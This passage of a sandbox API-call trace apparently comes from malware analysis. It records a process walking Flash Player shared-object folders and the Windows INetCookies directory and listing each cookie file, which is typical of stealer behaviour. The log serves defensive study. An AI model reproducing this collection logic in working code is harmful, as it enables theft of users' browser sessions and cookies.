Player\\macromedia.com\\support\\flashplayer", lpDst=0x79c7c10, nSize=0x61 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 0x61 [0251.396] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 96 [0251.396] lstrlenW (lpString="*.sol") returned 5 [0251.396] PathCombineW (in: pszDest=0x79c5910, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*.sol" [0251.396] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*.sol", lpFindFileData=0x79c56b0 | out: lpFindFileData=0x79c56b0) returned 0xffffffffffffffff [0251.396] PathCombineW (in: pszDest=0x79c5910, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0251.397] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x79c56b0 | out: lpFindFileData=0x79c56b0) returned 0x4407760 [0251.397] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x79c56b0 | out: lpFindFileData=0x79c56b0) returned 1 [0251.397] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.397] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x79c56b0 | out: lpFindFileData=0x79c56b0) returned 1 [0251.397] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.397] lstrlenW (lpString="sys") returned 3 [0251.397] PathCombineW (in: pszDest=0x79c5910, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0251.397] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x65 [0251.397] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpDst=0x79b14b0, nSize=0x65 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 0x65 [0251.397] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 100 [0251.397] lstrlenW (lpString="*.sol") returned 5 [0251.397] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*.sol" [0251.397] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*.sol", lpFindFileData=0x79c5b20 | out: lpFindFileData=0x79c5b20) returned 0x4406e60 [0251.397] lstrlenW (lpString="settings.sol") returned 12 [0251.397] lstrlenW (lpString="*.sol") returned 5 [0251.397] wcscpy (in: _Dest=0x79c5da8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0251.397] StrRChrW (lpStart="*.sol", lpEnd=0x0, wMatch=0x1005c) returned 0x0 [0251.397] PathCombineW (in: pszDest=0x79c5da8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="settings.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" [0251.397] FindNextFileW (in: hFindFile=0x4406e60, lpFindFileData=0x79c5b20 | out: lpFindFileData=0x79c5b20) returned 0 [0251.397] FindClose (in: hFindFile=0x4406e60 | out: hFindFile=0x4406e60) returned 1 [0251.398] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0251.398] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x79c5b20 | out: lpFindFileData=0x79c5b20) returned 0x44079a0 [0251.398] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x79c5b20 | out: lpFindFileData=0x79c5b20) returned 1 [0251.398] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.398] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x79c5b20 | out: lpFindFileData=0x79c5b20) returned 1 [0251.398] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.398] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x79c5b20 | out: lpFindFileData=0x79c5b20) returned 0 [0251.398] FindClose (in: hFindFile=0x44079a0 | out: hFindFile=0x44079a0) returned 1 [0251.398] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x79c56b0 | out: lpFindFileData=0x79c56b0) returned 0 [0251.398] FindClose (in: hFindFile=0x4407760 | out: hFindFile=0x4407760) returned 1 [0251.398] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0 [0251.398] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.398] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0 [0251.398] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.399] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0251.399] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.399] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x79b1750 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 0x0 [0251.399] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.399] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x43 [0251.399] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", lpDst=0x7aae530, nSize=0x43 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 0x43 [0251.399] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 66 [0251.399] lstrlenW (lpString="*.txt") returned 5 [0251.399] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="*.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\*.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\*.txt" [0251.399] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\*.txt", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0x4407760 [0251.400] lstrlenW (lpString="2XBM2EDN.txt") returned 12 [0251.400] lstrlenW (lpString="*.txt") returned 5 [0251.400] wcscpy (in: _Dest=0x79b1998, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.400] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff0005c) returned 0x0 [0251.400] PathCombineW (in: pszDest=0x79b1998, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="2XBM2EDN.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\2XBM2EDN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\2XBM2EDN.txt" [0251.400] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.400] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.400] lstrlenW (lpString="8489XH4E.txt") returned 12 [0251.400] lstrlenW (lpString="*.txt") returned 5 [0251.400] wcscpy (in: _Dest=0x79b1aa8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.400] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff0005c) returned 0x0 [0251.400] PathCombineW (in: pszDest=0x79b1aa8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="8489XH4E.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\8489XH4E.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\8489XH4E.txt" [0251.400] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.400] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.400] lstrlenW (lpString="B4K109K7.txt") returned 12 [0251.400] lstrlenW (lpString="*.txt") returned 5 [0251.400] wcscpy (in: _Dest=0x7aaef58, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.400] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0x5c) returned 0x0 [0251.400] PathCombineW (in: pszDest=0x7aaef58, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="B4K109K7.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B4K109K7.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B4K109K7.txt" [0251.400] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.400] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.400] lstrlenW (lpString="B67M68H4.txt") returned 12 [0251.400] lstrlenW (lpString="*.txt") returned 5 [0251.401] wcscpy (in: _Dest=0x7aaf068, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.401] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0x5c) returned 0x0 [0251.401] PathCombineW (in: pszDest=0x7aaf068, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="B67M68H4.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B67M68H4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B67M68H4.txt" [0251.401] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.401] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.401] lstrlenW (lpString="OOUVZSZN.txt") returned 12 [0251.401] lstrlenW (lpString="*.txt") returned 5 [0251.401] wcscpy (in: _Dest=0x7aaf178, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.401] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0x5c) returned 0x0 [0251.401] PathCombineW (in: pszDest=0x7aaf178, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="OOUVZSZN.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\OOUVZSZN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\OOUVZSZN.txt" [0251.401] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.401] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.401] lstrlenW (lpString="TIGZFGLM.txt") returned 12 [0251.401] lstrlenW (lpString="*.txt") returned 5 [0251.401] wcscpy (in: _Dest=0x7aaf288, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.401] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0x5c) returned 0x0 [0251.401] PathCombineW (in: pszDest=0x7aaf288, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="TIGZFGLM.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\TIGZFGLM.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\TIGZFGLM.txt" [0251.401] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.401] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.401] lstrlenW (lpString="XNW1G0SM.txt") returned 12 [0251.401] lstrlenW (lpString="*.txt") returned 5 [0251.401] wcscpy (in: _Dest=0x79c54c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\" [0251.401] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.401] PathCombineW (in: pszDest=0x79c54c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="XNW1G0SM.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\XNW1G0SM.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\XNW1G0SM.txt" [0251.401] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0 [0251.401] FindClose (in: hFindFile=0x4407760 | out: hFindFile=0x4407760) returned 1 [0251.402] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\*" [0251.402] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\*", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0x4406e00 [0251.402] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.402] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.402] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.402] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.402] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.402] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.402] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.402] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.402] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.402] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.402] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.402] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.402] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.402] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.402] lstrlenW (lpString="DNTException") returned 12 [0251.402] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="DNTException" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException" [0251.402] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x4f [0251.402] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException", lpDst=0x7aae5c0, nSize=0x4f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException") returned 0x4f [0251.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException") returned 78 [0251.402] lstrlenW (lpString="*.txt") returned 5 [0251.403] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException", pszFile="*.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\*.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\*.txt" [0251.403] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\*.txt", lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0xffffffffffffffff [0251.403] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\*" [0251.403] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\*", lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0x44067a0 [0251.403] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.403] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.403] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.403] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.403] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.403] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.403] lstrlenW (lpString="Low") returned 3 [0251.403] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException", pszFile="Low" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low" [0251.403] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x53 [0251.403] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low", lpDst=0x79c5c80, nSize=0x53 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low") returned 0x53 [0251.403] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low") returned 82 [0251.403] lstrlenW (lpString="*.txt") returned 5 [0251.403] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low", pszFile="*.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low\\*.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low\\*.txt" [0251.403] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low\\*.txt", lpFindFileData=0x79c5a20 | out: lpFindFileData=0x79c5a20) returned 0xffffffffffffffff [0251.404] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low\\*" [0251.404] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\DNTException\\Low\\*", lpFindFileData=0x79c5a20 | out: lpFindFileData=0x79c5a20) returned 0x4406a40 [0251.404] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c5a20 | out: lpFindFileData=0x79c5a20) returned 1 [0251.404] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.404] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c5a20 | out: lpFindFileData=0x79c5a20) returned 0 [0251.404] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.404] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0 [0251.404] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.404] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.404] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.404] lstrlenW (lpString="Low") returned 3 [0251.404] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", pszFile="Low" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") 